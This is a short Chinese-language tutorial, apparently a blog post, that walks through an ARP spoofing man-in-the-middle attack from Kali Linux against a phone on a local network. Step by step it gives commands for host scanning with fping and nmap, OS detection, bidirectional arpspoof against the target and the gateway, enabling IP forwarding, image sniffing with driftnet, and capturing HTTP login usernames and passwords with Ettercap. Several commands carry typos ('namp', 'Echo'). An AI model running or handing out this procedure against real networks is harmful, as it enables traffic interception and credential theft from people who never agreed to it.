kali系统局域网进行arp欺骗
kali进行arp欺骗
目标:手机
操作系统:kali实体机(虚拟机也可以)
所用插件:终端
准备工作:首先kali和攻击端要在同一局域网内
1.首先扫描ip,找到攻击端ip
(1). fping -g -r 0 -s 192.168.0/24 | grep alive扫描局域网内ip
(2). fping -g -r 0 -s 192.168.1.0/24 | grep alive扫描局域网内ip
扫描出来的ip包含网关(路由器),和kali的ip(kali的ip查看:ifconfig ip -a)
或者:namp -sP 192.168.1.1/24进行扫描
2.系统进行检测
(1).namp -T4 -O 192.168.1.101 192.168.1.104 检测出来的ip最小值和最大值
注:(需要多执行几次,可以以(2 host up)为准,但是如果一直不出来的话,可以进行下一步)
(此为检测出来的数据,可以配合手机上的ping软件进行攻击)
3.arp欺骗
1.arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
(网卡) (目标ip) (网关ip)
2.进行双向欺骗
3. arpspoof -i eth0 -t 192.168.1.1 192.168.1.101
(此时发现攻击端(手机,电脑等等)是无法上网的状态)
4.网络恢复
Echo 1 > /proc/sys/net/ipv4/ip_forward
可以进到此目录进行查看
cat /proc/sys/net/ipv4/ip_forward
5.进行图片嗅探(结果并不是很好,微信好像不行)
driftnet -i eth0
(1)会出现一个显示图片嗅探后展示的窗口
6.嗅探登陆密码(只可以是HTTP协议的)
Ettercap -Tq -i eth0
username为登陆账号;password为登陆密码
此视就可以获取密码。
安装kali实体机双系统安装教程:
https://www.bilibili.com/video/BV1m741157fs
此教程到此结束。